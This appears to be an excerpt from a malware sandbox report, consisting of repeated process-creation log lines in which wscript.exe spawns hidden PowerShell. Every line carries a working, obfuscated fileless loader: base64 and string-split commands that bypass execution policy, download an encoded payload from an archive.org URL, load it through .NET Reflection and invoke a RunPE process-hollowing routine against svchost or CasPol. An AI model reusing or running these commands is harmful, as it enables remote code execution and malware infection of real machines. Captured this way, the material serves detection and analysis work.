([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
